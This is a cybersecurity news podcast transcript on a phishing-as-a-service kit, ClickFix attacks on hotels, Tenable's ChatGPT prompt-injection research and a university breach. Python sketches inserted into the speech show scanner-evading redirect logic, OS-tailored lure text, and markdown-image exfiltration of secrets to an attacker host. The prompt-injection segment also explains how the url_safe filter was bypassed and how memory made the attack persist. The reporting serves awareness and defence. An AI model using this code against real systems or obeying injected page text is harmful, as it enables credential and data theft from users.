Transcript
A (0:00)
Cybersecurity Today would like to thank Meter for their support in bringing you this podcast. Meter delivers a complete networking stack, wired, wireless, and cellular, in one integrated solution that's built for performance and scale. You can find them at meter.com/CST.
B (0:19)
New industrial phishing kit Quantum Route Redirect active in 90 countries. Large-scale ClickFix phishing attacks target hotel systems. Researchers trick ChatGPT into prompt injecting itself. And UPenn confirms a massive data breach following a hack. This is Cybersecurity Today, and I'm your host, David Shipley. Let's get started. There's a new phishing-as-a-service platform making waves on the cybercrime scene, and it's helping change the game in the attacker's favor. It's called Quantum Route Redirect, or QRR, and according to Bleeping Computer, it's a fully automated phishing engine using a sprawling network of domains to steal Microsoft 365 credentials. What makes QRR so dangerous isn't just the sheer scale of it. It's the level of automation and sophistication built right in. This thing handles every stage of a phishing attack automatically, from sending the fake emails to rerouting victims through multiple domains, stealing credentials, and even tracking results on a dashboard. It's a phishing factory in a box. Here's how it works. The attack starts with an email that looks perfectly normal: a DocuSign request, a payment alert, maybe a missed voicemail or a QR code. But when you click or scan the link, it doesn't take you straight to a Microsoft login page. Instead, QRR quietly reroutes you through a network of compromised domains, filtering who or what gets through. If the system detects a real person, it redirects them to the phishing landing page. If it detects an automated scanner, like the kind used by email security tools, it sends those somewhere harmless, like a legitimate website. That means many security tools never get to see the malicious content. This is phishing automation built at scale to beat email defense automation at scale. The criminals behind QRR even track their campaign performance in real time, watching which targets are human, which are bots, and which messages are getting the most reaction. 
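To make the human-versus-scanner filtering concrete, here is a minimal sketch of the idea, not QRR's actual code: a redirect layer that checks the visitor's User-Agent string against known scanner markers and sends suspected bots to a harmless decoy. The function name, marker list, and heuristics are all hypothetical; real kits use many more signals (IP reputation, TLS fingerprints, behavioral checks).

```python
# Illustrative sketch of scanner-filtering logic in a phishing redirect layer.
# NOT QRR's real code; names and heuristics here are hypothetical.

# Substrings commonly found in automated scanners' User-Agent strings
SCANNER_MARKERS = ("bot", "crawler", "spider", "scan", "safebrowsing")

def route_visitor(user_agent: str, phishing_url: str, decoy_url: str) -> str:
    """Return the decoy for suspected scanners, the phishing page otherwise."""
    ua = user_agent.lower()
    if any(marker in ua for marker in SCANNER_MARKERS):
        return decoy_url      # automated scanner: show something harmless
    return phishing_url       # likely human: show the fake login page
```

A security crawler identifying itself as `URLScan-Bot/1.0` would be routed to the decoy, while an ordinary browser User-Agent would reach the credential-harvesting page, which is why the email filter may never see what the victim sees.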
Since August, QRR attacks have been seen in more than 90 countries, with nearly three quarters of those attacks targeting users in the United States. And QRR isn't alone. It's part of a growing ecosystem of industrialized phishing services with names like VoidProxy, Darcula, Morphing Meerkat, and Tycoon 2FA, all designed to make cybercrime faster, cheaper, and easier to scale. So what's the takeaway here? Phishing isn't just getting more creative, it's getting even more automated. The days of handcrafted scams dominating phishing are clearly over, and we're in the era of data-driven, globally distributed platforms that can outmaneuver traditional defenses. And that means organizations have to continue to evolve as well. Layered defenses matter a lot. Email filters are still important, but so are active monitoring for compromised accounts and, above all, continuing to build a culture of security with awareness and behavior programs to help people spot and stop threats. A new and highly targeted phishing campaign is hitting the hospitality industry. According to The Hacker News, cybercriminals are using a ClickFix-style attack to trick hotel managers into installing malware known as PureRAT, giving attackers full remote access to their systems and booking accounts. Here's how it works. The campaign starts with a compromised email account, often from another hotel, sending what looks like a legitimate Booking.com message to managers at other properties. The email includes a link that appears to be a security verification step, supposedly to, quote, confirm your connection or validate your Booking.com credentials. Clicking that link starts a chain of redirects that leads to a fake page posing as a security check, complete with a reCAPTCHA window to make it look authentic. But here's where the social engineering style known as ClickFix comes in. The page tells the targeted user to copy and paste a PowerShell command to verify their system. 
What that command actually does is download a zip file containing a malicious binary, one that sets up persistence on the machine and loads the PureRAT malware through DLL side-loading. Once installed, PureRAT can do almost anything: capture keystrokes, take over webcams and microphones, exfiltrate data, and even act as a proxy for further attacks. And the threat doesn't stop there. After stealing credentials from hotel systems, these attackers log into booking platforms like Booking.com or Expedia, using the access to target real hotel guests. Victims have reported receiving fake emails and WhatsApp messages that appear to come from legitimate hotels, complete with real reservation details. The messages warn that their booking could be canceled unless they reconfirm their credit card information. That link, of course, leads to a phishing page that steals their payment data. This campaign has been active since at least April and continues to evolve. Researchers have even found threat actors on Telegram openly buying and selling Booking.com administrator accounts, either as cookies or as login credentials harvested from previous infections. The trade is surprisingly structured. One actor calling themselves ModeratorBooking even runs a booking log verification service, promising to check stolen credentials within 24 to 48 hours. The tools to do this are readily available on cybercrime forums for as little as $40. All of this underscores a troubling trend: the industrialization of cybercrime continues apace. Every step of this attack chain, from credential theft to malware delivery to resale and monetization, now operates as a service. And that means smaller, less skilled threat actors can participate in sophisticated campaigns without ever learning to write a line of code. The latest twist in this ClickFix-style attack includes video instructions, countdown timers, and even fake user verification counters. 
These elements are designed to make the phishing page look even more legitimate. The pages now adapt dynamically to the victim's operating system, showing Windows users how to open the Run command and Mac users how to open the Terminal, even automatically copying the malicious command to the clipboard. It's all about lowering the friction and increasing trust, the same psychological manipulation that makes social engineering so effective in general. The big takeaway here? No industry is immune from the professionalization of phishing. And when social engineering meets this kind of automation, even trained users can be tricked into doing the attacker's work for them. The key is to make your people as resilient as possible, but also, if they do realize they've fallen victim, to make sure they feel motivated to report it. For the hospitality sector, where customer trust is everything, these attacks aren't just about stealing money, they're stealing your reputation. As we rush to adopt AI everywhere, all the time, researchers keep finding some of the same old problems. These systems can be incredibly powerful, but they're still so easily manipulated. According to CSO Online, security researchers at Tenable have discovered seven new ways attackers could extract private data from ChatGPT chat histories, largely through indirect prompt injection attacks that exploit the chatbot's own built-in features. These vulnerabilities were found in the latest GPT-5 model, and while some have been patched, others still work. It's the latest reminder that AI isn't immune to classic security issues. In fact, these systems seem to be coming with more than their fair share. And if anything, these new technologies are just reinventing old problems in more complex, layered ways. Here's how this particular attack works. When ChatGPT searches the web or opens a link, it uses a separate system called SearchGPT to visit and summarize web pages. 
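The OS-adaptive behavior described above can be sketched in a few lines. This is an illustration of the concept, not code from the actual campaign: real kits do this in browser JavaScript, and the detection strings and instruction text here are hypothetical.

```python
# Illustrative sketch of a ClickFix lure page tailoring its instructions
# to the visitor's OS. Hypothetical; real kits do this client-side in JS.

def clickfix_instructions(user_agent: str) -> str:
    """Pick OS-specific 'verification' instructions from the User-Agent."""
    ua = user_agent.lower()
    if "windows" in ua:
        # Windows victims are told to use the Run dialog
        return "Press Win+R, paste the copied command, and press Enter"
    if "mac os" in ua or "macintosh" in ua:
        # Mac victims are told to use the Terminal
        return "Open Terminal, paste the copied command, and press Return"
    return "Unsupported platform"
```

Combined with auto-copying the command to the clipboard, the victim only has to paste and press Enter, which is exactly the friction reduction the attackers are after.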
Attackers realized they could hide malicious instructions inside a website's code, maybe in a blog comment, or, classically, using invisible text, so that when SearchGPT reads that page, it unknowingly picks up those hidden commands. That's the first step. The second step is what Tenable calls a conversation injection. That's when the hidden commands tell SearchGPT to inject another command directly into the user's ChatGPT conversation, tricking ChatGPT into prompt injecting itself. Once that happens, attackers could potentially get access to private information from the user's chat history, things like prior messages or stored context. But how do they get that stolen data out? Tenable found a surprisingly creative way. By exploiting how ChatGPT renders markdown text, including image links, an attacker could encode letters as image URLs and monitor which images the chatbot tries to load, allowing them to reconstruct its hidden response one letter at a time. Ten points for cleverness on that one. It's messy, it's slow, but it works. OpenAI uses a safeguard called url_safe to block suspicious links, but unsurprisingly, Tenable found that Bing tracking URLs can slip through those filters because Bing's domain is implicitly trusted. Even more concerning, because ChatGPT now has long-term memory, attackers could in theory ask it to remember those malicious prompts, making the exploit persistent across future chats. Tenable calls this a, quote, perfect storm scenario. And while OpenAI has fixed some of the issues, others remain. AI does not understand intent. It just follows instructions, and in the wrong context, that obedience can and will be weaponized. The larger lesson here is clear: particularly when it comes to AI in the browser, these tools are not ready for prime time. Regardless of whether you're using them personally or professionally, these tools can carry massive risk. Always think critically about the outputs of AI and the access AI has to your systems. 
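The letter-at-a-time exfiltration channel is easier to see in code. Here is a minimal sketch of the idea Tenable described, with a hypothetical attacker domain and URL scheme of my own invention: each character becomes one markdown image tag whose URL encodes the character's position and code point, and the attacker's web server logs reconstruct the secret from the image requests the renderer makes.

```python
# Illustrative sketch of markdown-image exfiltration (Python 3.9+).
# The domain, path scheme, and function names are hypothetical.

def encode_as_image_markdown(secret: str, attacker_host: str) -> list[str]:
    """One markdown image tag per character; position + code point in the URL."""
    return [
        f"![x](https://{attacker_host}/p/{i}/{ord(ch)}.png)"
        for i, ch in enumerate(secret)
    ]

def decode_from_requests(request_paths: list[str]) -> str:
    """Rebuild the secret from request paths logged by the attacker's server."""
    pairs = []
    for path in request_paths:                  # e.g. "/p/0/104.png"
        _, index, code_png = path.strip("/").split("/")
        pairs.append((int(index), chr(int(code_png.removesuffix(".png")))))
    # Requests may arrive out of order, so sort by position before joining
    return "".join(ch for _, ch in sorted(pairs))
```

When the chatbot renders those image tags, each fetch leaks one character to the attacker's server logs, which is why it's slow and messy but still works as a covert channel.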
These companies are so eager to rush new technologies out, they aren't thinking through security. Clearly, you have to. The University of Pennsylvania has confirmed that hackers stole data from its systems at the end of October, after sending taunting emails from official university addresses to alumni and staff. Penn had dismissed those emails as fraudulent, but as TechCrunch reported, the university later confirmed the breach was real. As people noted, the messages came from legitimate Penn email accounts. Attackers gained access to Penn systems tied to alumni and donor records, sent out offensive messages, and stole data before systems were secured. The attackers have alleged they obtained more than 1.2 million people's personal information. A UPenn graduate has now filed the first of what will likely be many class action lawsuits, claiming the school failed to protect personal information after the hack. According to Penn, the breach began with a social engineering attack. That's concerning enough, but a detail in TechCrunch's reporting raises even more serious questions about Penn's approach to security. A university employee anonymously told TechCrunch that while Penn requires multi-factor authentication, or MFA, some high-ranking officials were granted exemptions. Now, we don't know yet whether those exemptions were connected to this particular attack. Penn hasn't said whether the compromised account belonged to someone who was not using MFA. But the very existence of those exemptions should make every organization take a hard look at its own practices. Because when leadership exempts itself from security controls, it doesn't just paint a huge target on those leaders and create a risk for the organization, it creates a culture of double standards. It tells everyone in an organization that cybersecurity is optional if you're important enough. And that's dangerous, regardless of what kind of organization you are. 
If these MFA exemptions were a part of this breach, they raise an additional risk for Penn: cyber insurance coverage. Here's a cautionary tale. Earlier this year, the city of Hamilton in Ontario, Canada, learned this lesson the hard way. Its $5 million cyber insurance claim was denied after a ransomware attack because the city had not fully implemented multi-factor authentication across all of its systems, despite knowing it was required to do so under its policy. In other words, the insurer walked away because Hamilton didn't meet its obligations. If Penn or any other organization knowingly exempts senior officials or others from MFA, it's not just inviting attackers to take a run at them. It may also be inviting its insurer to walk away when it matters most. So even if MFA exemptions seem like a small administrative accommodation, they carry massive governance, culture, and financial implications. This breach is another reminder that cybersecurity is not just a technical issue, it is a leadership issue. The standards leaders set for themselves define the standards everyone else will follow, and the research we've done at Beauceron shows people care about this. Organizations where people think their senior leaders care, where leaders talk the talk and walk the walk, have lower phishing click rates, i.e., they're less risky. Make sure that your organization is one where people believe senior leaders care and act in a secure way. You can contact us at technewsday.com or leave a comment under the YouTube video. Please help us spread the word: like, subscribe, or consider leaving a review. And if you enjoy the show, please tell others. We've seen our audience grow because of your help, and we're grateful for it. We'd love to continue to grow our audience, and we still need your help. I've been your host, David Shipley. Jim Love will be back on Friday.
